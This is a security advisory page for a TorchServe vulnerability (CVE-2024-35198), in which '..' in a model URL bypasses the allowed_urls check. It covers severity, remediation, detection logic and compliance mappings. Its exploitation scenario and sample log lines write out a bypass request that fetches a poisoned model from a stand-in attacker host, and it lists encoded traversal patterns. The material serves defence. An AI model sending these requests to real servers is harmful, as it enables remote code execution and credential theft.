CVE-2024-35198: TorchServe: URL bypass enables arbitrary model loading

CRITICAL PoC AVAILABLE
Published July 19, 2024
CISO Take

Any TorchServe deployment not running v0.11.0 can have its model allowlist completely circumvented — an unauthenticated attacker can load any model from any URL by injecting '..' characters. Upgrade to 0.11.0 immediately; if blocked, firewall the management API (default port 8081) to trusted IPs only. AWS SageMaker and EKS users are not affected.

What is the risk?

Critical. CVSS 9.8 with no authentication, no user interaction, and network-accessible attack vector makes this trivially exploitable from the internet. The bypass is a simple URL manipulation technique requiring no AI/ML knowledge. TorchServe management APIs are frequently left exposed on internal networks or misconfigured cloud deployments, widening the blast radius. The core risk is not just model substitution but potential RCE through malicious model artifacts.

What systems are affected?

Package | Ecosystem | Vulnerable Range | Patched
PyTorch | pip | (not listed) | No patch

Do you use PyTorch? You're affected.

How severe is it?

CVSS 3.1: 9.8 / 10
EPSS: 0.8% chance of exploitation in 30 days (higher than 52% of all CVEs)
Exploitation Status: Exploit Available
Exploitation: MEDIUM
Sophistication: Trivial
Exploitation Confidence: medium (public PoC indexed in trickest/cve)

Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV (Attack Vector): Network
AC (Attack Complexity): Low
PR (Privileges Required): None
UI (User Interaction): None
S (Scope): Unchanged
C (Confidentiality): High
I (Integrity): High
A (Availability): High

What should I do?

5 steps
  1. PATCH

    Upgrade TorchServe to v0.11.0 or later — this is the only complete fix.

  2. IMMEDIATE WORKAROUND

    Restrict network access to the TorchServe management API (port 8081) via firewall rules or security groups to trusted CI/CD and MLOps IP ranges only.

  3. AUDIT

    Inspect current model store for unexpected or recently-added models; compare against your approved model registry.

  4. DETECT

    Alert on model registration API calls (POST /models) that originate from unexpected source IPs or whose url parameter contains a dot-dot sequence in raw or URL-encoded form (.., %2E%2E, or double-encoded %252E).

  5. HARDEN

    Even post-patch, enforce network segmentation — management APIs should never be internet-facing.
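The DETECT step above, worked out as an added Python example (not from the original page or from TorchServe): it reads constructed access-log lines as a reverse proxy in front of the management port might write them, percent-decodes the url parameter until stable so double-encoded sequences collapse, and flags POST /models registrations that come from outside a constructed trusted range or carry a '..' path segment. The log format, the trusted network and the sample lines are all assumptions.

```python
import ipaddress
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed trusted CI/CD and MLOps source ranges; substitute your own.
TRUSTED_NETS = [ipaddress.ip_network("10.20.0.0/16")]

# Common-log-format line from a reverse proxy in front of port 8081 (constructed format).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"')

def fully_decode(value: str, max_rounds: int = 5) -> str:
    """Percent-decode until stable so double-encoded %252E%252E collapses to '..'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line: str):
    """Return an alert dict for a suspicious model registration, else None."""
    m = LOG_RE.match(line)
    if not m or m["method"] != "POST":
        return None
    target = urlsplit(m["target"])
    if target.path.rstrip("/") != "/models":  # only the registration endpoint
        return None
    reasons = []
    if not any(ipaddress.ip_address(m["ip"]) in net for net in TRUSTED_NETS):
        reasons.append("untrusted source IP")
    urls = [fully_decode(u) for u in parse_qs(target.query).get("url", [])]
    # A '..' path segment in the model URL is the bypass pattern this CVE describes.
    if any(".." in u.split("/") for u in urls):
        reasons.append("dot-dot segment in model URL")
    return {"ip": m["ip"], "urls": urls, "reasons": reasons} if reasons else None

def detect_suspicious_registrations(lines):
    return [alert for alert in map(inspect_line, lines) if alert]

SAMPLE_LOG_LINES = [  # constructed sample traffic
    '10.20.3.7 - - [19/Jul/2024:10:00:00 +0000] "POST /models?url=https%3A%2F%2Fallowed-partner.com%2Fresnet18.mar HTTP/1.1" 200 55',
    '203.0.113.9 - - [19/Jul/2024:10:01:00 +0000] "POST /models?url=https%3A%2F%2Fevil.com%2F..%2Fallowed-partner.com%2Fpoisoned_resnet.mar HTTP/1.1" 200 55',
    '10.20.3.8 - - [19/Jul/2024:10:02:00 +0000] "POST /models?url=https%3A%2F%2Fevil.com%2F%252E%252E%2Fallowed-partner.com%2Fx.mar HTTP/1.1" 200 55',
    '203.0.113.9 - - [19/Jul/2024:10:03:00 +0000] "POST /predictions/poisoned_resnet HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    for alert in detect_suspicious_registrations(SAMPLE_LOG_LINES):
        print(alert)
```

The third sample line shows why single-pass decoding is not enough: a trusted source still triggers an alert once the doubly encoded dots are normalized.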

What does CISA's SSVC say?

Decision Track
Exploitation none
Automatable No
Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
Article 9 - Risk management system
ISO 42001
A.6.1.4 - AI system resource and capability management
A.9.3 - AI system integrity
NIST AI RMF
MANAGE 2.2 - Mechanisms to sustain the value of deployed AI
OWASP LLM Top 10
LLM05 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2024-35198?

Any TorchServe deployment not running v0.11.0 can have its model allowlist completely circumvented — an unauthenticated attacker can load any model from any URL by injecting '..' characters. Upgrade to 0.11.0 immediately; if blocked, firewall the management API (default port 8081) to trusted IPs only. AWS SageMaker and EKS users are not affected.

Is CVE-2024-35198 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-35198, increasing the risk of exploitation.

How to fix CVE-2024-35198?

1. PATCH: Upgrade TorchServe to v0.11.0 or later — this is the only complete fix. 2. IMMEDIATE WORKAROUND: Restrict network access to the TorchServe management API (port 8081) via firewall rules or security groups to trusted CI/CD and MLOps IP ranges only. 3. AUDIT: Inspect the current model store for unexpected or recently added models; compare against your approved model registry. 4. DETECT: Alert on model registration API calls (POST /models) that originate from unexpected source IPs or whose url parameter contains a dot-dot sequence in raw or URL-encoded form (.., %2E%2E, or double-encoded %252E). 5. HARDEN: Even post-patch, enforce network segmentation — management APIs should never be internet-facing.

What systems are affected by CVE-2024-35198?

This vulnerability affects the following AI/ML architecture patterns: model serving, MLOps pipelines, inference infrastructure, training pipelines.

What is the CVSS score for CVE-2024-35198?

CVE-2024-35198 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 0.79%.

What is the AI security impact?

Affected AI Architectures

model serving, MLOps pipelines, inference infrastructure, training pipelines

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0010.003 Model
AML.T0018.000 Poison AI Model
AML.T0018.002 Embed Malware
AML.T0049 Exploit Public-Facing Application

Compliance Controls Affected

EU AI Act: Article 15, Article 9
ISO 42001: A.6.1.4, A.9.3
NIST AI RMF: MANAGE 2.2
OWASP LLM Top 10: LLM05

What are the technical details?

Original Advisory

TorchServe is a flexible and easy-to-use tool for serving and scaling PyTorch models in production. TorchServe's check on the allowed_urls configuration can be bypassed if the URL contains characters such as "..", but it does not prevent the model from being downloaded into the model store. Once a file is downloaded, it can be referenced without providing a URL the second time, which effectively bypasses the allowed_urls security check. Customers using PyTorch inference Deep Learning Containers (DLC) through Amazon SageMaker and EKS are not affected. This issue in TorchServe has been fixed by validating the URL without characters such as ".." before downloading; see PR #3082. TorchServe release 0.11.0 includes the fix to address this vulnerability. Users are advised to upgrade. There are no known workarounds for this vulnerability.

Exploitation Scenario

An attacker targeting an organization's ML inference infrastructure sends a POST request to TorchServe's management API: 'POST /models?url=https://evil.com/../allowed-partner.com/poisoned_resnet.mar'. The URL validation checks the allowlist against the raw string but does not normalize the path, so 'allowed-partner.com' appears in the URL and passes the check. TorchServe downloads the model from evil.com into the local model store. The attacker then triggers inference via 'POST /predictions/poisoned_resnet' — no URL required this time since the model is cached locally. The malicious MAR file executes arbitrary code during deserialization, establishing persistence or exfiltrating credentials from the ML worker process.
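The raw-string allowlist check the scenario describes, beside a hardened version, as an added Python example (not TorchServe's code; the set of trusted hosts and the parsing approach are assumptions, and the example does not reproduce TorchServe's allowed_urls format): the naive check accepts the scenario's sample URL because the allowed host appears somewhere in the string, while the strict check parses the URL first, refuses any '..' segment in raw or percent-encoded form, and compares only the parsed hostname against the allowlist.

```python
from urllib.parse import unquote, urlparse

# Constructed allowlist of hosts that models may be fetched from (illustrative).
TRUSTED_HOSTS = {"allowed-partner.com"}

def naive_allowed(url: str) -> bool:
    """The flawed pattern the scenario describes: an allowed host only has to
    appear somewhere in the raw URL string; nothing is parsed or normalized."""
    return any(host in url for host in TRUSTED_HOSTS)

def strict_allowed(url: str) -> bool:
    """Hardened check: parse first, refuse traversal segments (raw or
    percent-encoded), then compare the actual hostname exactly."""
    parsed = urlparse(url)
    if parsed.scheme != "https" or parsed.hostname is None:
        return False
    # Decode the path so '%2E%2E' is judged the same way as '..'.
    segments = unquote(parsed.path).split("/")
    if any(seg in ("..", ".") for seg in segments):
        return False
    return parsed.hostname.lower() in TRUSTED_HOSTS

def evaluate(url: str) -> dict:
    """Return both verdicts so the gap between them is visible."""
    return {"naive": naive_allowed(url), "strict": strict_allowed(url)}

if __name__ == "__main__":
    # A legitimate model URL (constructed) and the scenario's bypass URL.
    for u in ("https://allowed-partner.com/resnet18.mar",
              "https://evil.com/../allowed-partner.com/poisoned_resnet.mar"):
        print(u, evaluate(u))
```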

Weaknesses (CWE)

CWE-706 — Use of Incorrectly-Resolved Name or Reference: The product uses a name or reference to access a resource, but the name/reference resolves to a resource that is outside of the intended control sphere.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Timeline

Published
July 19, 2024
Last Modified
September 4, 2025
First Seen
July 19, 2024
